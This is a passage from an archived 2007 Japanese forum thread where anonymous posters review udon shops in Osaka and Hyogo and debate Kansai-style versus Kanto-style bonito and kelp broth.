客の自由ちゃうんかい?
なんで、おっさんの気を使って食べなあかんねん!!!
確かに美味かったけど、
もっと安い値段で同じようなうどんは食えることを確認した次第
それと、店員がトイレから出てきて
濡れた手を拭かずに
そのままエプロンをして厨房に立ってたよ。

はっきり言って、たいしたことない。

うるせ〜よ、おっさん!!

377 :名無しさん@お腹いっぱい。:2007/03/01(木) 01:53:07 ID:7Ka3jcs2
はは…なんか親父さん忙しくて神経質になってしまったのかねー
でも混ぜたから無視ってのは思い込みだと思うよ
はっきりいってそんな客は連日普通にいる



378 :名無しさん@お腹いっぱい。:2007/03/02(金) 03:01:19 ID:B7kDhjOG
>>374
マジレスするとカレーうどんとカレー蕎麦では
カレー蕎麦の方が先に世に出た。

カレーうどんは蕎麦より弱いうどんの風味が吹っ飛んで
台無しになってると思うんだが・・。
カレーにはナンかご飯が合ってると思う。


はがくれは行った事無いけど、客にあれこれうるさいという
噂はたまに聞く。

379 :名無しさん@お腹いっぱい。:2007/03/04(日) 17:08:15 ID:l81Qz8Lp
交野の楽々と門真のきぬ川で連食。
きぬ川は13時頃行ったけど俺だけだった。たまたまかな?
うどんは旨かったぞ。

380 :名無しさん@お腹いっぱい。:2007/03/04(日) 23:01:24 ID:FDwcGG+v
>>379
きぬ川、客の入りはイマイチだよなぁ。いつ行ってもガラガラ。
土・日と連続で食べたけど、個人的にはかなりウマいと思うのだが。
宣伝が下手なのか立地が悪いのか。
いずれにせよ、もったいないよな。

381 :名無しさん@お腹いっぱい。:2007/03/05(月) 00:53:30 ID:cU2e+/lY
>>380
平日の昼飯時は結構入ってるよ。
頑張って欲しいよなぁ。

最近増えたメニューに、鶏天ぶっかけの定食がある。
あれが旨い。最近はちく玉ぶっかけから浮気中。

382 :名無しさん@お腹いっぱい。:2007/03/05(月) 07:46:05 ID:BeLTXBsR
西宮の梅八に行ってきたんだが、あれはダメだ。
ダシが水臭すぎ。それとうどんが粉っぽい。
話にならない。

383 :名無しさん@お腹いっぱい。:2007/03/05(月) 20:54:15 ID:6dIihE86
>>381
確かに鶏天は旨い。
きぬ川、揚げ物が全般的に当たりだけど、
鶏天とちく天は頭抜けて旨いと思う。

でも、マイベストは、あんかけだったりしてw

384 :名無しさん@お腹いっぱい。:2007/03/05(月) 21:08:36 ID:sbBrNRSQ
>>382
何を食べたの?
ひょっとして、鰹節と醤油の味しか受け付けない東の人?
阪神間の名店として評判の「梅八」で、今まで聞いたことのない評価だよ。


385 :名無しさん@お腹いっぱい。:2007/03/06(火) 07:56:34 ID:fwVJxgk3
>>384
丼とのセットだから、うどんは素うどんだね。
一番シンプルなやつ。
それと俺は尼崎市民だ。東の人間じゃないよ。
名店として評判が高かったから、期待して行ったのだが
大いに裏切られた。

386 :名無しさん@お腹いっぱい。:2007/03/06(火) 09:00:06 ID:iVQP5z6o
>>385
よく考えたら、東の人間がダシ味の表現で、水臭い、とは書かん罠。

しかし、ダシはともかく、麺はそんなに悪くないとは思うのだが。
ちょっと粉の感じが出てる方が好みという人もいるようだし。
他の人の意見も聞いてみたいね。

387 :名無しさん@お腹いっぱい。:2007/03/06(火) 18:50:43 ID:+I0cSTVq
関西に旨い店は0

388 :名無しさん@お腹いっぱい。:2007/03/06(火) 19:39:40 ID:I0r4B56H
そういや大阪で関西風出汁ではないうどんor蕎麦出す店ってあるのか?
自分は関東出身なので濃い鰹出汁が時々無性に飲みたくなるんだが。
関東で関西風の出汁で出す店はあっても逆は見つけられないんだよな。
あるなら多少遠くても行ってみたいんだがなぁ。
>>386
確かに「出汁が水臭い」て表現は何だかわからなかった。
何となくニュアンスでわかるけど「ダシがきいてない」くらいしか言わないな。

389 :名無しさん@お腹いっぱい。:2007/03/06(火) 22:45:48 ID:WCPPc64g
>>388
関東人じゃないけど蕎麦には鰹出汁の濃いつゆが合うと思う
あっちにいくと駅そばでもうどんとそばと出汁を変えるところがあるけど
確かに関西ではほとんど見ないね

390 :名無しさん@お腹いっぱい。:2007/03/06(火) 22:47:21 ID:fqkJXkHk
関西の讃岐うどんって鰹出汁多いよね


391 :名無しさん@お腹いっぱい。:2007/03/07(水) 01:12:57 ID:+Oxw2IvC
>>390
そだね。
やっぱりイリコのみだとつらいんかなあ。

392 :名無しさん@お腹いっぱい。:2007/03/07(水) 16:14:57 ID:/lodUSvL
つけ蕎麦で鰹出汁ってのはあるが、かけ蕎麦で鰹出汁ってないよな。
梅田ヨドバシの更科にも行ったがやっぱり微妙に関西風にアレンジされてる気がした。
今まで食べた中ではそじ坊が一番鰹きいてる気がしたがあそこうどん無いんだよな。
鰹出汁のきいた鴨南蛮うどんが食いたい。

393 :名無しさん@お腹いっぱい。:2007/03/07(水) 19:58:22 ID:2ugpBPL0
やっぱり、昆布出汁のきいた鴨南蛮うどんの方が旨いからね。

394 :名無しさん@お腹いっぱい。:2007/03/20(火) 00:42:47 ID:gePdUI/s
きぬ川、魔法のレストランが取材するそうだ。
複雑・・。

395 :名無しさん@お腹いっぱい。:2007/03/20(火) 22:47:42 ID:hf3Zzl46
本日西宮北「いわしや」、門真「讃岐一番」にいって両方とも
茹で置きにあたった。
いわしやのは少しボソボソしていまいちだったが
讃岐一番はそれでもそこそこ旨かった。

396 :名無しさん@お腹いっぱい。:2007/03/21(水) 21:59:29 ID:zGE+1H4u
>>376 確かにちと煩いよな。一応旨いと思っていたが、器の洗い方見て萎えた。水ためたシンクに次々と洗剤ついたドンブリをくぐらす=洗剤薄めた水にドンブリ浸けただけ?洗い担当のおばちゃんよ…

397 :名無しさん@お腹いっぱい。:2007/03/22(木) 12:30:52 ID:Dy8NVVjd
ゆきのに行ってきた。
10人位並んでたがうどんやしすぐやろう
と思い並んだが、約一時間待ちで入店orz

味は、いい具合にコシがありまあ美味かったけど、値段が高目。
一時間も並んで食べる程のもんやないなぁ

95 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)